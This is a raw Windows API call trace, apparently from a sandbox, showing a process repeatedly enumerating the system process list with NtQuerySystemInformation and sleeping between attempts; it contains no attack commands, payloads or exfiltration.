NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.609] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.626] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.641] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.658] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.688] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.703] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.719] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.735] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.751] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.765] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.782] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.796] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.813] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.830] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.843] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.859] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.878] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.890] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.907] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.922] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 